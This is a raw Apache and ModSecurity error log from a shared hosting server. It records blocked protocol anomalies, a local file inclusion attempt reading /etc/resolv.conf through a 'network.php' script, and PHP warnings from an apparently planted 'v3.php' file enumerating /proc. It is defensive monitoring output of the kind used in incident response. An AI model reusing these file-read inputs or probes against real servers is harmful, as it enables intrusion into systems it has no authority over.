PHP Warning:  filesize(): stat failed for /proc/228/task/228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/228/task/228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/228/task/228/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:14:34.328226 2026] [security2:error] [pid 1511173:tid 1511185] [client 150.109.12.46:60304] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIcivjVc-A-CSptvm1jjwAAAEk"]
[Mon May 11 20:15:47.368057 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:47.528447 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:47.697089 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:47.855282 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.013310 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.172499 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.330560 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.488604 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.655003 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.813171 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:48.971207 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.129233 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.287362 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.461915 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.619930 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.778174 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:49.963994 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.122142 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.280284 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.438425 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.596745 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.756080 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:50.914450 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.072532 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.230700 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.388826 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.546739 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.705231 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:51.863302 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.022356 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.195547 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.356578 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.515053 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.673694 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.832760 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:52.990618 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.149078 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.307175 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.465235 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.631238 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.789258 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:53.949243 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:54.107413 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:54.265502 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:54.423728 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:15:54.588359 2026] [:error] [pid 1511173:tid 1511182] [client 4.193.137.131:1156] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 20:16:02.874517 2026] [ssl:error] [pid 1534836:tid 1534879] (EAI 2)Name or service not known: [client 17.246.23.90:50068] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 20:16:02.874594 2026] [ssl:error] [pid 1534836:tid 1534879] AH01941: stapling_renew_response: responder error
[Mon May 11 20:16:07.621861 2026] [security2:error] [pid 1501883:tid 1501898] [client 43.157.175.122:60282] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pour-la-scene"] [unique_id "agIc5zP5Q_-MBliRCAxZpgAAAA0"]
[Mon May 11 20:16:10.646227 2026] [security2:error] [pid 1502013:tid 1502050] [client 43.157.175.122:38236] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/pour-la-scene/"] [unique_id "agIc6pYn-x0CHsbEbP2fVgAAAJg"], referer: https://www.maelbailly.fr/pour-la-scene
[Mon May 11 20:16:32.776390 2026] [authz_core:error] [pid 1516058:tid 1516113] [client 47.128.28.163:60018] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/Requests/library/error_log
[Mon May 11 20:16:34.152025 2026] [:error] [pid 1501883:tid 1501892] [client 114.119.133.119:23749] File does not exist: /home/totalcloud/public_html/index.php, referer: https://totalcloud.fr/webshop?ccce=cart&a=checkout&systpl=six&language=croatian
PHP Warning:  filesize(): stat failed for /proc/948/task/948/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/948/task/948/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/948/task/948/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/948/task/948/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/109/task/109/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/109/task/109/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/109/task/109/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/109/task/109/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/849/task/849/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/849/task/849/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/849/task/849/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/849/task/849/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:16:43.714496 2026] [authz_core:error] [pid 1516058:tid 1516110] [client 216.73.216.110:1600] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/tests/Bridge/Nette/error_log
[Mon May 11 20:17:02.630660 2026] [security2:error] [pid 1502013:tid 1502041] [client 216.73.216.110:18802] ModSecurity: Warning. Matched phrase "etc/resolv.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/resolv.conf found within ARGS:filesrc: /etc/resolv.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIdHpYn-x0CHsbEbP2fngAAAI4"]
[Mon May 11 20:17:02.631517 2026] [security2:error] [pid 1502013:tid 1502041] [client 216.73.216.110:18802] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIdHpYn-x0CHsbEbP2fngAAAI4"]
[Mon May 11 20:17:02.740258 2026] [security2:error] [pid 1502013:tid 1502041] [client 216.73.216.110:18802] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIdHpYn-x0CHsbEbP2fngAAAI4"]
[Mon May 11 20:17:59.699235 2026] [security2:error] [pid 1511173:tid 1511197] [client 43.157.179.227:58032] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/reservation/"] [unique_id "agIdV_jVc-A-CSptvm1ktQAAAFU"]
[Mon May 11 20:18:27.275382 2026] [security2:error] [pid 1501831:tid 1501835] [client 43.134.98.88:60970] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIdc1NddpkriGUb6ZVp-gAAAQI"]
[Mon May 11 20:19:17.324234 2026] [security2:error] [pid 1502013:tid 1502044] [client 43.166.224.244:51394] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "apoe.fr"] [uri "/actualites.html"] [unique_id "agIdpZYn-x0CHsbEbP2gRQAAAJE"]
[Mon May 11 20:19:25.279645 2026] [security2:error] [pid 1501883:tid 1501908] [client 43.134.57.179:55624] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/mentions-legales"] [unique_id "agIdrTP5Q_-MBliRCAxaqQAAABc"]
[Mon May 11 20:19:31.750406 2026] [security2:error] [pid 1502013:tid 1502048] [client 43.134.57.179:35172] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/mentions-legales/"] [unique_id "agIds5Yn-x0CHsbEbP2gWAAAAJY"], referer: https://www.jeanboyault.fr/mentions-legales
[Mon May 11 20:19:44.287296 2026] [authz_core:error] [pid 1501831:tid 1501833] [client 40.77.167.26:39948] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/error_log
[Mon May 11 20:19:56.427776 2026] [security2:error] [pid 1511173:tid 1511182] [client 1.207.95.187:4226] ModSecurity: Warning. Matched phrase "user-agent:" at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "33"] [id "913100"] [rev "2"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: user-agent: found within REQUEST_HEADERS:User-Agent: user-agent:mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "pweil.com"] [uri "/"] [unique_id "agIdzPjVc-A-CSptvm1lNAAAAEY"], referer: http://pweil.com/
[Mon May 11 20:19:56.428525 2026] [security2:error] [pid 1511173:tid 1511182] [client 1.207.95.187:4226] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "pweil.com"] [uri "/"] [unique_id "agIdzPjVc-A-CSptvm1lNAAAAEY"], referer: http://pweil.com/
[Mon May 11 20:19:56.428765 2026] [security2:error] [pid 1511173:tid 1511182] [client 1.207.95.187:4226] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Found User-Agent associated with security scanner"] [tag "event-correlation"] [hostname "pweil.com"] [uri "/"] [unique_id "agIdzPjVc-A-CSptvm1lNAAAAEY"], referer: http://pweil.com/
[Mon May 11 20:19:58.189856 2026] [:error] [pid 1516058:tid 1516096] [client 114.119.159.61:46203] File does not exist: /home/domaine1/public_html/erreur.php
[Mon May 11 20:20:08.537339 2026] [security2:error] [pid 1516058:tid 1516105] [client 43.163.5.216:50054] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/lage-de-raison/"] [unique_id "agId2CMeXtzav-mi9SykGgAAAM8"]
[Mon May 11 20:20:30.391208 2026] [security2:error] [pid 1502013:tid 1502044] [client 129.226.146.134:51722] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/wp/v2/pages/104"] [unique_id "agId7pYn-x0CHsbEbP2gpAAAAJE"]
[Mon May 11 20:20:40.735440 2026] [security2:error] [pid 1534836:tid 1534873] [client 43.153.54.138:44764] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "moncampingcarenligne.com"] [uri "/"] [unique_id "agId-NeaRXe5lR8y0ZOGvwAAAUI"]
[Mon May 11 20:21:04.519216 2026] [authz_core:error] [pid 1502013:tid 1502060] [client 40.77.167.26:39968] AH01630: client denied by server configuration: /home/labaujue/public_html/wp-includes/l10n/error_log
[Mon May 11 20:21:17.166198 2026] [security2:error] [pid 1502013:tid 1502066] [client 43.130.105.21:39586] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.com"] [uri "/"] [unique_id "agIeHZYn-x0CHsbEbP2g4AAAAIM"]
[Mon May 11 20:21:48.656129 2026] [authz_core:error] [pid 1534836:tid 1534890] [client 47.128.46.83:22790] AH01630: client denied by server configuration: /home/missmand/public_html/vendor/cocur/slugify/error_log
[Mon May 11 20:21:59.208811 2026] [security2:error] [pid 1501883:tid 1501907] [client 175.27.171.245:45382] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agIeRzP5Q_-MBliRCAxbcgAAABY"], referer: http://piregwan-genesis.com
[Mon May 11 20:22:03.274607 2026] [security2:error] [pid 1501883:tid 1501905] [client 43.156.47.42:46372] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "agIeSzP5Q_-MBliRCAxbdgAAABQ"]
[Mon May 11 20:22:09.989139 2026] [security2:error] [pid 1501883:tid 1501908] [client 43.167.241.46:51040] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.tchatbooster.com"] [uri "/"] [unique_id "agIeUTP5Q_-MBliRCAxbeAAAABc"]
